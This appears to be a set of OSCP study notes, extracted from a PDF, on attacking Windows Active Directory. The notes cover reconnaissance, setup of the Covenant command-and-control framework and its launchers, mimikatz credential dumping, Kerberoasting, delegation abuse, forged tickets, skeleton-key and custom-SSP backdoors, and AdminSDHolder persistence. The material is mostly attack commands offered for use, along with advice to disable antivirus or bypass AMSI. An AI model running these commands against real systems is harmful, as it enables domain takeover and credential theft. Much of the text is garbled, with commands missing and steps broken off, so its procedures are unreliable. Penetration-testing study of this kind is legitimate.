Oscp Notes Active Directory 1
Oscp Notes Active Directory 1
Oscp Notes Active Directory 1
https://www.linkedin.com/in/joas-antonio-dos-santos
Summary
Sumário ..............................................................................................................................2
Exam Info ............................................................................................................................3
Laboratory ..........................................................................................................................3
Reconnaissance ...................................................................................................................5
Initial Access...................................................................................................................... 20
Covenant C2 Setup ............................................................................................................ 21
Covenant Attack – AD .................................................................................................... 24
Lateral Movement ............................................................................................................. 33
Domain Privilege Escalation 1 ............................................................................................ 39
Domain Persistence 1 ........................................................................................................ 51
Payload .NET ..................................................................................................................... 62
Cheat Sheet ....................................................................................................................... 64
Privilege Escalation ........................................................................................................ 64
Lateral Movement ......................................................................................................... 66
Defense Evasion............................................................................................................. 67
Credential Dumping ....................................................................................................... 68
Exam Info
https://marmeus.com/post/OSCP-Review
https://medium.com/@0xP/oscp-2022-tips-to-help-you-pass-
dddd3563967e
https://jaiguptanick.github.io/Blog/blog/OSCP_Cracking_New_Pattern_W
alkthrough/
https://www.linkedin.com/pulse/oscp-tips-2022-lagarian-
smith/?trk=articles_directory
https://dev.to/hackin7/my-oscp-experience-c9
Laboratory
Reconnaissance
Active Reconnaissance
Nmap
Ping Sweep
UDP Scan:
nmap [target]
nmap -A [target]
nmap -6 [target]
nmap -F [target]
nmap -r [target]
Discovery Options
-Po No ping
Do Not Ping
UDP Ping
IP Protocol Ping
ARP ping
Traceroute
nmap -R [target]
nmap -n [target]
Service/Version Detection
Script Scan
OS Detection
Nmap Switch Description
Fragment Packets
nmap -f [target]
Use a Decoy
UDP Scan
Xmas Scan
IP Protocol Scan
Send IP Packets
Timing Options
Timing Templates
Host Timeout
Shellshock
Massscan
https://github.com/robertdavidgraham/masscan
GitHub
scanner/portscan
post/windows/gather/arp_scanner RHOST=<ip_range>
post/multi/manage/autoroute
Searchsploit
searchsploit <keyword>
PS C:\> .\ADRecon.ps1
To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType
is STDOUT with -Collect parameter)
When you run ADRecon, a ADRecon-Report-<timestamp> folder will be created which will
contain ADRecon-Report.xlsx and CSV-Folder with the raw files.
https://github.com/sense-of-security/ADRecon
https://github.com/outflanknl/Recon-AD
Using BloodHound
Use the correct collector
• AzureHound for Azure Active Directory
• SharpHound for local Active Directory
• use AzureHound
• # require: Install-Module -name Az -AllowClobber
• # require: Install-Module -name AzureADPreview -AllowClobber
• Connect-AzureAD
• Connect-AzAccount
• . .\AzureHound.ps1
Invoke-AzureHound
• use BloodHound
• # run the collector on the machine using SharpHound.exe
• #
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/Shar
pHound.exe
• # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
• .\SharpHound.exe -c all -d active.htb --searchforest
• .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include
GPOLocalGroup by default
• .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC,
doesn't query the computers (more stealthy)
•
• #Will show us the policy configurations of the Domain about system access or
kerberos
• (Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
• Get Domain Controlers:
• Get-NetDomainController
Get-NetDomainController -Domain <DomainName>
• Enumerate Domain Users:
• Get-NetUser
• Get-NetUser -SamAccountName <user>
• Get-NetUser | select cn
• Get-UserProperty
•
• #Check last password change
• Get-UserProperty -Properties pwdlastset
•
• #Returns all GPOs in a domain that modify local group memberships through
Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
• Enumerate Shares
• #Enumerate Domain Shares
• Find-DomainShare
•
• #Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
• Enum Domain Trust:
• Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
• Enum Forest Trust:
• Get-NetForestDomain
• Get-NetForestDomain Forest <ForestName>
•
Initial Access
https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-
access-remote-shell
https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-
digitalocean
https://www.ired.team/offensive-security/code-execution
Bash Bunny
USB Drop Attacks: The Danger of “Lost And Found” Thumb Drives
Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter -
Defcon 24
POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2)
Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012
Defense-In-Depth write-up
https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/
Covenant C2 Setup
https://captainroot.com/blog/getting-started-with-covenant-c2-in-kali-linux/
https://michaelkoczwara.medium.com/covenant-c2-quick-setup-on-windows-296a0d400de2
This is a quick walkthrough on installing Covenant Command & Control (C&C) framework on
Kali Linux. I tested this on Kali 2020.3. but this should work for later version updates as well.
Let’s get started.
First, you need to download the .NET Core framework for Linux. At the time of writing the
latest version was 3.1. You can find the latest *recommended* release over here:
Official .NET Core downloads for Linux, macOS, and Windows. .NET Core is a cross-platform
version of .NET, for building…
dotnet.microsoft.com
I have a 64bit Kali linux. I’ve read some recommendations mentioning to use 64bit bit instead
of 32bit Kali when installing Covenant. I downloaded the 64bit version of the .NET SDK package
from the .NET Core 3.1 download page. Screenshot below:
Once the tar.gz file is downloaded on to my Kali host, I pretty much followed the instructions
from here to extract it and set the relevant environment variables. I’ve detailed the steps I
took below for clarity.
The above command will extract the contents to your $HOME/dotnet folder as confirmed
below:
Now set the environment variables required with the following commands:
export DOTNET_ROOT=$HOME/dotnet
export PATH=$PATH:$HOME/dotnet
And you are done setting up the .NET Core framework needed for Covenant. Now, lets move
on to installing Covenant itself.
I installed Covenant under my ~/tools folder, so feel free to change the location as you need:
cd ~/toolsgit clone --recurse-submodules https://github.com/cobbr/Covenant
The above will download Covenant from Github repository. It will use up about 141Mb of
space. Once downloaded:
cd Covenant/Covenant
donet build
Running the above command will start building the Covenant project. It built successfully, you
should get a message like this:
dotnet run
This will start the Covenant web service on TCP port 7443. You can check this via another
terminal by running:
# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:7443 0.0.0.0:* LISTEN 1650543/Covenant
Now, open up a web browser and point to port 7443 of your Kali host. For example, if your Kali
host IP is 192.168.1.10 you should be trying https://192.168.1.10:7443 , as an example.
You will get a certificate warning, which you can safely ignore for now and proceed, which will
redirect you to /covenantuser/login path. If everything has gone well so far, this should take
you to the Covenant initial user registration page as shown below:
Prove a username and password to register an account. Make sure you remember this
password or save it securely somewhere.
Once logged in, you will be taken to the /home/index path where the Covenant dashboard will
be displayed to you as shown below:
https://dian-pentest.medium.com/install-covenant-on-kali-linux-c0350804648d
Covenant Attack – AD
https://www.youtube.com/watch?v=6C8tzKb3kEQ
https://infosecwriteups.com/hack-the-box-sauna-write-up-w-covenant-c2-c2d71141c90b
Creating Listener
Before we can use the Covenant for red teaming activity, the first thing we need to setup is
Listener. Basically covenant Listener is same as the usual listener we have used like netcat or
meterpreter. In covenant, stager is called as Grunt. We will talk about it in the next section
below. First of all, create the listener at listener menu.
• Name: Identifier name for the listener, default is generated value but you can set it as
you like
• ConnectAddress & ConnectPort: Address and port that will be used as connect back
for the stager.
After we create the listener, it will show in listeners list. For example, I create listener with
name First-Listener and type is HTTP.
Listener
Start the listener we’ve created before and it will show you the new information in listener like
the figure below
Start Listener
Listener Active
We can double-check to make sure if listener is successfully active using this command in
terminal:
Launcher
Launchers are all in one payload delivery feature that generate, host, and download
binaries/script to launch new Grunts
Covenant Launcher
• Binary — The Binary launcher is used to generate custom binaries that launch a Grunt.
This is currently the only launcher that does not rely on a system binary.
• MSBuild — The MSBuild launcher is used to generate an MSBuild XML file that
launches a Grunt using msbuild.exe.
• InstallUtil — The InstallUtil launcher is used to generate an InstallUtil XML file that
launches a Grunt using installutil.exe.
• Mshta — The Mshta launcher is used to generate an HTA file and/or a mshta one-liner
that launches a Grunt using mshta.exe that relies on DotNetToJScript.
• Regsvr32 — The Regsvr32 launcher is used to generate an SCT file and/or regsvr32
one-liner that launches a Grunt using regsvr32.exe that relies on DotNetToJScript.
• Wmic — The Wmic launcher is used to generate an xsl file and/or wmic one-liner that
launches a Grunt using wmic.exethat relies on DotNetToJScript.
• Cscript — The Cscript launcher is used to generate a JScript file a Grunt
using cscript.exe that relies on DotNetToJScript.
For this article, I will use Powershell Launcher as the example. Don’t forget to disable windows
defender or bypass the AMSI first(it will be discuss later).
Creating Launcher
Create PowerShellLauncher
Choose and customize with your own environment. I suggest that you choose GruntHTTP for
the implant template. After that, click generate and it will generate a launcher and encoded
launcher for our need.
Generated launcher
Testing Launcher
We need to test our launcher in our windows box to see how the payload and communication
work. Open command prompt and paste the generated launcher.
Powershell launcher
As we can see from above picture, our launcher is successfully connect to listener in grunt. This
is what look like in grunts
Grunt information
We can interact with the victim machine using covenant interact feature in grunt
Grunt interaction
I think that’s all for the getting started article about Covenant C2. Will talk about the more
covenant feature in the next article.
If you like this article, please share it and feedback are always welcome.
Reference:
• https://posts.specterops.io/entering-a-covenant-net-command-and-control-
e11038bcf462
https://petruknisme.medium.com/getting-started-with-covenant-c2-for-red-teaming-
8eeb94273b52
https://github.com/active-labs/ACTIVEBlog/blob/master/Red%20Team%20Infrastructure%20-
%20C2/Red%20Team%20Infrastructure%20-%20C2.md
• Windows Privilege Escalation CheatSheet Cheat Sheet for Windows Local Privilege
Escalations
Works only until Windows Server 2016 and Windows 10 until patch 1803
Works only until Windows Server 2016 and Windows 10 until patch 1803
• SMBGhost CVE-2020-0796
PoC
• CVE-2021-36934 (HiveNightmare/SeriousSAM)
Enable-PSRemoting
Mimikatz
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
mimikatz privilege::debug
mimikatz sekurlsa::tickets
mimikatz sekurlsa::tspkg
mimikatz sekurlsa::dpapi
mimikatz sekurlsa::ekeys
mimikatz lsadump::sam
mimikatz lsadump::secrets
mimikatz token::elevate
#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz ts::sessions
mimikatz vault::list
• #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set
to 0x1
• #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your
mimikatz.exe
• mimikatz # !+
•
• #Finally run the logonpasswords function to dump lsass
mimikatz # sekurlsa::logonpasswords
o PPLdump
• #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we
can still use keyloggers or clipboard dumpers to capture data.
• #Lets inject our own malicious Security Support Provider into memory, for this
example i'll use the one mimikatz provides
• mimikatz # misc::memssp
#Now every user session and authentication into this machine will get logged and plaintext
credentials will get captured and dumped into c:\windows\system32\mimilsa.log
POWERSHELL REMOTING
Invoke-Mimikatz -DumpCreds
Enter-PSSession $sess
exit
Enter-PSSession $sess
# DUMPING
FORWARDER
# RULE
# CHECK
# RESET
KERBEROS DOUBLE HOPS - Remote ticket dumping - SMB Lateral Hosting (skill)
• A command you run on ServerB via your PowerShell Remoting session attempts to
access a resource on ServerC.
Access to the resource on ServerC is denied, because the credentials you used to create
the PowerShell Remoting session are not passed from ServerB to ServerC.
Cannot encapsulate multiple psremoting session.
Delegation not available.
# PSREMOTE TO SERVER A
# CHECK INJECTION:
Invoke-Command -ScriptBlock { ls \\serverc\c$ } -Session $serverb
# RCE ON SERVER C:
WUT IS DIS?:
All standard domain users can request a copy of all service accounts along with their
correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user"
account, extract the encrypted blob that was encrypted using the user's password and
bruteforce it offline.
• PowerView:
Get-NetUser -SPN
• #Get every available SPN account, request a TGS and dump its hash
Invoke-Kerberoast
Request-SPNTicket
• AD Module:
Rubeus:
• #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled
accounts
ASREPRoast
WUT IS DIS?:
If a domain user account do not require kerberos preauthentication, we can request a valid
TGT for this account without even having domain credentials, extract the encrypted
blob and bruteforce it offline.
Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more! Check for
interesting permissions on accounts:
Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because
Machine Account hashes are not crackable!
PowerView:
Invoke-ASREPRoast -Verbose
• Using Rubeus:
• Using Impacket:
If we have harvest some passwords by compromising a user account, we can use this method
to try and exploit password reuse on other domain accounts.
Tools:
• DomainPasswordSpray
• CrackMapExec
• Invoke-CleverSpray
• Spray
WUT IS DIS ?: If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a
target account, request a TGS, then grab its blob and bruteforce it.
• PowerView:
•
• #Check if current user has already an SPN setted:
• AD Module:
Finally use any tool from before to grab the hash and kerberoast it!
If you have local administrator access on a machine try to list shadow copies, it's an easy way
for Domain Escalation.
1. You can dump the backuped SAM database and harvest credentials.
• %appdata%\Microsoft\Credentials
• %localappdata%\Microsoft\Credentials
#By using the cred function of mimikatz we can enumerate the cred object and get information
about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#From the previous command we are interested to the "guidMasterKey" parameter, that tells
us which masterkey was used to encrypt the credential
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
#Now if we are on the context of the user (or system) that the credential belogs to, we can use
the /rpc flag to pass the decryption of the masterkey to the domain controler:
dpapi::cache
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
Unconstrained Delegation
Using PowerView:
Get-NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT
Constrained Delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using
kekeo
#Then using the TGT we have ask a TGS for a Service this user has Access to through
constrained delegation
What if we have delegation rights for only a spesific SPN? (e.g TIME):
In this case we can still abuse a feature of kerberos called "alternative service". This allows us
to request TGS tickets for other "alternative" services and not only for the one we have rights
for. Thats gives us the leverage to request valid tickets for any service we want that the host
supports, giving us full access over the target machine.
WUT IS DIS?:
TL;DR
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we
can abuse it and impersonate ourselves as any user of the domain to it. For example we can
impersonate Domain Administrator and have complete access.
• PowerView
• Powermad
• Rubeus
First we need to enter the security context of the user/machine account that has the privileges
over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
. .\Powermad.ps1
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
#Then by using the SID we are going to build an ACE for the new created machine account
using a raw security descriptor:
$SD.GetBinaryForm($SDBytes, 0)
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
#And for this example, we are going to impersonate Domain Administrator on the cifs service
of the target computer using Rubeus
dir \\TargetMachine.wtver.domain\C$
Detailed Articles:
#Command on Rubeus
WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup
Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the
current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our
privileges to DA.
1. Once we have access on an account that has the SeBackupPrivilege we can access the
DC and create a shadow copy using the signed binary diskshadow:
2. #Create a .txt file that will contain the shadow copy process script
3. Script ->{
6. set verbose on
7. begin backup
9.
10. create
11.
14. }
15.
diskshadow /s script.txt
17. Next we need to access the shadow copy, we may have the SeBackupPrivilege but we
cant just simply copy-paste ntds.dit, we need to mimic a backup software and use
Win32 API calls to copy it on an accessible folder. For this we are going to
use this amazing repo:
22. Get-SeBackupPrivilege
23.
25. Set-SeBackupPrivilege
26.
27. #Use the functionality of the dlls to copy the ntds.dit database file from the shadow
copy to a location of our choice
29.
33. Use psexec or another tool of your choice to PTH and get Domain Admin access.
Abusing Exchange
• CVE-2020-0688
• PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange
• NetNTLMtoSilverTicket
Abusing ACLs
• aclpwn.py
• Invoke-ACLPwn
• mitm6
WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't
enabled (most of the times is not), we can abuse it to privilege escalate to Domain
Administrator of the root domain of the forest. This is possible because of the SID History field
on a kerberos TGT ticket, that defines the "extra" security groups and privileges.
Exploitation example:
Format: RootDomainSID-519
#Forge "Extra" Golden Ticket using mimikatz
kerberos::ptt \path\to\ticket\golden.kirbi
dir \\dc.root.domain.local\C$
Detailed Articles:
Exploiting SharePoint
Zerologon
PrintNightmare
Note: Certify can be executed with Cobalt Strike's execute-assembly command as well
This exploit only works because these settings enable server/client authentication, meaning an
attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with
Rubeus to forge authentication.
Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended.
Check before choosing a DA to target.
The exported cert.pem and cert.key files must be consolidated into a single cert.pem file, with
one gap of whitespace between the END RSA PRIVATE KEY and the BEGIN CERTIFICATE.
Example of cert.pem:
BIIEogIBAAk15x0ID[...]
[...]
[...]
-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[...]
[...]
[...]
-----END CERTIFICATE-----
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -
export -out cert.pfx
Once the cert.pfx file has been exported, upload it to the compromised host (this can be done
in a variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload
functionality, etc.)
After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to
request a Kerberos TGT for the DA account which will then be imported into memory.
This should result in a successfully imported ticket, which then enables an attacker to perform
various malicious acitivities under DA user context, such as performing a DCSync attack.
No PAC
Domain Persistence 1
DCsync Attack
Tip:
/ptt -> inject ticket on current running session
/ticket -> save the ticket on the system for later use
SPN List
DSRM Abuse
WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password
which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local
Administrator access to DC!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Custom SSP
WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from
mimikatz, that will monitor and capture plaintext passwords from users that logged on!
From powershell:
#Append mimilib:
$packages += "mimilib"
#ALTERNATIVE:
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
ACCOUNT DUMPING
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01
GOLDEN TICKET
On any machine
SILVER TICKET
# Check WMI
• Create a silver ticket for the HOST SPN which will allow us to schedule a task
SKELETON KEY
# REMOTE
$sess = New-PSSession DC01.domain.local
# OR
# LOGIN
# PASSWORD mimikatz
mimikatz # privilege::debug
mimikatz # !+
mimikatz # misc::skeleton
mimikatz # !-
DSRM
/ntlm:00000000000000000000000000000000 /run:powershell.exe"
$packages = Get-ItemProperty
$packages += "mimilib"
Set-ItemProperty
# CHECK C:\Windows\system32\kiwissp.log
ADMINSDHOLDER
• Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of
protected groups and members with the ACL of AdminSDHolder and any differences
are overwritten on the object ACL
Protected Groups
Replicator
Groups Resume
Account
Cannot modify DA/EA/BA groups. Can modify nested group within
Operators
Server Operators Run a command as system (using the disabled Browser service)
Set-ADACL -DistinguishedName
'CN=AdminSDHolder,CN=System,DC=test,DC=domain,DC=local' -Principal attacker -Verbose
#
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName
attacker -Rights WriteMembers -Verbose
Import-Module Invoke-SDPropagator.ps1
# CHECK
. .\PowerView.ps1
# DCSYNC
Rights Abuse
• Add FullControl rights
• Execute DCSync
SECURITY DESCRIPTORS
• WMI
• PSREMOTE
• REMOTE REGISTRY
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-
Sheet/tree/master/H%20-%20Persistence
Payload .NET
Additional Reading
Research:
• https://www.nccgroup.trust/uk/about-us/newsroom-and-
events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-
code-execution-via-paste/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-
events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-
deserialisation/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-
events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
• https://www.nccgroup.trust/uk/our-research/use-of-deserialisation-in-.net-
framework-methods-and-classes/?research=Whitepapers
• https://community.microfocus.com/t5/Security-Research-Blog/New-NET-
deserialization-gadget-for-compact-payload-When-size/ba-p/1763282
• https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-
via-viewstate/
• https://www.nccgroup.trust/uk/about-us/newsroom-and-
events/blogs/2019/august/getting-shell-with-xamlx-files/
• https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and-
profit-2/
Usage:
• https://cert.360.cn/warning/detail?id=e689288863456481733e01b093c986b6
• https://labs.mwrinfosecurity.com/advisories/milestone-xprotect-net-deserialization-
vulnerability/
• https://soroush.secproject.com/blog/2018/12/story-of-two-published-rces-in-
sharepoint-workflows/
• https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-
an-elevation-of-privilege-in-docker-for-windows.html
• https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark-
password-vault-web-access-remote-code-execution
• https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
• https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a-
microsoft-sharepoint-rce-vulnerability
• https://www.zerodayinitiative.com/blog/2018/8/14/voicemail-vandalism-getting-
remote-code-execution-on-microsoft-exchange-server
• https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-
vulnerabilities-in-smartermail/
• https://www.nccgroup.trust/uk/our-research/technical-advisory-code-execution-by-
viewing-resource-files-in-net-reflector/
• https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-
services-ssrs/
• https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-
microsoft-exchange-server-through-fixed-cryptographic-keys
Talks:
• https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-
Attacks.pdf
• https://speakerdeck.com/pwntester/attacking-net-serialization
• https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-
vulnerable-endpoints
• https://gosecure.github.io/presentations/2018-03-18-
confoo_mtl/Security_boot_camp_for_.NET_developers_Confoo_v2.pdf
• https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf
• https://nullcon.net/website/archives/pdf/goa-2018/rohit-slides.pdf
Tools:
• https://github.com/pwntester/ViewStatePayloadGenerator
• https://github.com/0xACB/viewgen
• https://github.com/Illuminopi/RCEvil.NET
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Cheat Sheet
Privilege Escalation
PASSWORDS IN SYSVOL & GROUP POLICY PREFERENCES
DNSADMINS
• From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS
Administration
UNCONSTRAINED DELEGATION
• Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How
Compromise of a Single Server Can Compromise the Domain)
CONSTRAINED DELEGATION
• S4U2Pwnage
DOMAIN TRUSTS
• It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active
Directory Trusts
• Active Directory forest trusts part 1 - How does SID filtering work?
• The Forest Is Under Control. Taking over the entire Active Directory forest
• The Trustpocalypse
DCSHADOW
• DCShadow
• DCShadow explained: A technical deep dive into the latest AD attack technique
RID
• How to get SQL Server Sysadmin Privileges as a Local Admin with PowerUpSQL
RED FOREST
Lateral Movement
MICROSOFT SQL SERVER DATABASE LINKS
• SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server!
WSUS
• WSUSpendu
PASSWORD SPRAYING
Defense Evasion
IN-MEMORY EVASION
OPSEC
• Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat
Protection and Advanced Threat Analytics
• Invisi-Shell - Hide your Powershell script in plain sight. Bypass all Powershell security
features
• Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
SYSMON EVASION
• sysmon-config-bypass-finder
HONEYTOKENS EVASION
Credential Dumping
NTDS.DIT PASSWORD EXTRACTION
• How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
KERBEROASTING
• Roasting AS-REPs
DCSYNC
• Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync
LLMNR/NBT-NS POISONING
• Pwning with Responder – A Pentester’s Guide
OTHER
Persistence
GOLDEN TICKET
• Golden Ticket
SID HISTORY
SILVER TICKET
• Sneaky Active Directory Persistence #16: Computer Accounts & Domain Controller
Silver Tickets
DCSHADOW
ADMINSDHOLDER
SKELETON KEYS
• Unlocking All The Doors To Active Directory With The Skeleton Key Attack
• Skeleton Key
• Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers &
BackDoor Your Active Directory Forest
SEENABLEDELEGATIONPRIVILEGE
• The Most Dangerous User Right You (Probably) Have Never Heard Of
• Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)
DIRECTORY SERVICES RESTORE MODE
• Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)
• Shadow Admins – The Stealthy Accounts That You Should Fear The Most
• ADACLScanner - A tool with GUI or command linte used to create reports of access
control lists (DACLs) and system access control lists (SACLs) in Active Directory
• zBang - zBang is a risk assessment tool that detects potential privileged account
threats
• ADRecon - A tool which gathers information about the Active Directory and generates
a report which can provide a holistic picture of the current state of the target AD
environment
• Mimikatz - Utility to extract plaintexts passwords, hash, PIN code and kerberos tickets
from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets
https://0x1.gitlab.io/pentesting/Active-Directory-Kill-Chain-Attack-and-Defense/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20
Resources/Active%20Directory%20Attack.md
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/CyberSecurityUP/Red-Team-
Management/tree/main/Adversary%20Emulation